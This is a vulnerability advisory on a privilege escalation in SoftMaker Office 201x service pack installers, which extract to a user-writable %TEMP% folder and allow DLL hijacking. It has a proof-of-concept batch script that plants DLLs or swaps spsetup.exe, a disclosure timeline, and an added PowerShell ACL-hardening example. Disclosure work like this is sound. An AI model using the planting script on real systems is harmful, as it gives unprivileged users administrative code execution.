SoftMaker Office 201x Privilege Escalation

Risk: Medium
Local: Yes
Remote: No
CWE: CWE-264

Hi @ll,

the service pack installers for SoftMaker Office 201x, available from <>, are (surprise.-) vulnerable.

The executable installer (OUCH) ofw16_763.exe, a 7z SFX (OUCH), creates an UNPROTECTED directory "%TEMP%\7zSxxxxxxxx\" to extract its payload, then executes "%TEMP%\7zSxxxxxxxx\spsetup.exe". "%TEMP%\7zSxxxxxxxx\" inherits the NTFS access rights of its parent "%TEMP%\", i.e. allows full access for the UNPRIVILEGED user. For this well-known vulnerability see <> and <>.

Due to the embedded application manifest which specifies "requireAdministrator" the executable installer can only be run with administrative rights.

JFTR: if written properly, it would create a PROTECTED directory "%TEMP%\7zSxxxxxxxx\", writable only for privileged users!

The UNPRIVILEGED user as well as any program running with the user's credentials can modify the extracted files, for example "%TEMP%\7zSxxxxxxxx\spsetup.exe", which is executed with administrative rights, resulting in arbitrary code execution with elevation of privilege.

Additionally "spsetup.exe" is vulnerable to DLL hijacking, another well-known vulnerability. See <>, <>, <>, <>, <> and <> plus <>.

Thanks to the unprotected directory "%TEMP%\7zSxxxxxxxx\" the unprivileged user can write DLLs to "%TEMP%\7zSxxxxxxxx\" which are loaded by "spsetup.exe", again resulting in arbitrary code execution with elevation of privilege!

Proof-of-concept:
~~~~~~~~~~~~~~~~~

0. download <> and save it in an arbitrary directory;
1. download <> (see <> alias <>) and save it in an(other) arbitrary directory;
2. save the following batch script in the same directory as SENTINEL.DLL:

--- OFW16_873.CMD ---
:WAIT
@If Not Exist "%TEMP%\7z*" Goto :WAIT
For /D %%! In ("%TEMP%\7z*") Do Set foobar=%%!
Copy "SENTINEL.DLL" "%foobar%\NTMARTA.DLL"
Copy "SENTINEL.DLL" "%foobar%\VERSION.DLL"
Copy "SENTINEL.DLL" "%foobar%\WINSPOOL.DRV"
--- EOF ---

3. start the batch script;
4. execute ofw16_873.exe and notice the message boxes displayed by SENTINEL.DLL. PWNED!
5. download <> to the same directory as the batch script;
6. in the batch script replace the 3 lines "Copy ..." with
   Copy "SENTINEL.EXE" "%foobar%\spsetup.exe"
7. start the batch script;
8. execute ofw16_873.exe and notice the message box displayed by SENTINEL.EXE. PWNED!

Mitigations:
~~~~~~~~~~~~

* Don't use executable installers! NEVER! Don't use self-extractors! NEVER! See <> and <> plus <!execute.html> alias <!execute.html> for more information.

* Practice STRICT privilege separation: NEVER use the so-called "protected" administrator account(s) created during Windows setup which use the same "%TEMP%" for unprivileged and privileged processes!

* Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of every "%USERPROFILE%"; use <> to decode it to "deny execution of files in this directory for everyone, inheritable to all files in all subdirectories".

stay tuned
Stefan Kanthak

Timeline:
~~~~~~~~~

2016-12-15 sent vulnerability report to vendor
           no reply, not even an acknowledgement of receipt
2016-12-23 resent vulnerability report to vendor, cc CERT at german BSI
           no reply, not even an acknowledgement of receipt
2016-12-27 CERT at german BSI contacts vendor offering help
           no reply, not even an acknowledgement of receipt
2016-12-31 report published
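What "written properly" looks like, as an added example that is neither the advisory's nor SoftMaker's or 7-Zip's code: an elevated installer builds a DACL for SYSTEM and Administrators only and creates the extraction directory with that DACL already attached, plus a check that can be run over the "%TEMP%\7zS*" directories the advisory describes to see whether they are writable by anyone else. It assumes Windows PowerShell 5.1 (.NET Framework) on an elevated prompt; the function names and the generated directory name are hypothetical.

```powershell
# Added example, not the advisory's or SoftMaker's code: assumes Windows PowerShell 5.1 (.NET Framework)
# on an elevated prompt. The '7zS' prefix and the generated suffix are constructed to mirror the advisory.
$adminSids = @(
    (New-Object System.Security.Principal.SecurityIdentifier 'S-1-5-18'),    # NT AUTHORITY\SYSTEM
    (New-Object System.Security.Principal.SecurityIdentifier 'S-1-5-32-544')  # BUILTIN\Administrators
)

function New-ProtectedTempDirectory {
    param([string]$Parent = $env:TEMP)
    $path = Join-Path $Parent ('7zS' + [guid]::NewGuid().ToString('N').Substring(0, 8))

    # Build the DACL before the directory exists: $true cuts off inheritance from
    # "%TEMP%", $false discards the inherited (user-writable) ACEs, so the directory
    # never carries its parent's permissions, not even for an instant.
    $acl = New-Object System.Security.AccessControl.DirectorySecurity
    $acl.SetAccessRuleProtection($true, $false)
    foreach ($sid in $adminSids) {
        $rule = New-Object System.Security.AccessControl.FileSystemAccessRule(
            $sid, 'FullControl', 'ContainerInherit, ObjectInherit', 'None', 'Allow')
        $acl.AddAccessRule($rule)
    }
    # The owner holds WRITE_DAC implicitly, so it must not be the unprivileged user.
    $acl.SetOwner($adminSids[1])

    [System.IO.Directory]::CreateDirectory($path, $acl) | Out-Null
    return $path
}

function Test-ProtectedDirectory {
    # $true only if nobody except SYSTEM/Administrators can write to or re-ACL $Path.
    param([Parameter(Mandatory)][string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    if ($adminSids.Value -notcontains $acl.GetOwner([System.Security.Principal.SecurityIdentifier]).Value) { return $false }
    $writeMask = [int][System.Security.AccessControl.FileSystemRights]'Write, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        if ($adminSids.Value -contains $sid) { continue }
        if (([int]$ace.FileSystemRights -band $writeMask) -ne 0) { return $false }
    }
    return $true
}

# Usage: create one protected directory, then audit every "7zS*" directory an SFX
# installer left behind in %TEMP% (the pattern the advisory describes).
New-ProtectedTempDirectory | Out-Null
Get-ChildItem -LiteralPath $env:TEMP -Directory -Filter '7zS*' | ForEach-Object {
    [pscustomobject]@{ Path = $_.FullName; Protected = Test-ProtectedDirectory $_.FullName }
}
```

A directory left by the vulnerable installer reports Protected = False because its inherited ACEs grant the profile owner Modify or FullControl; the one created by New-ProtectedTempDirectory reports True.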
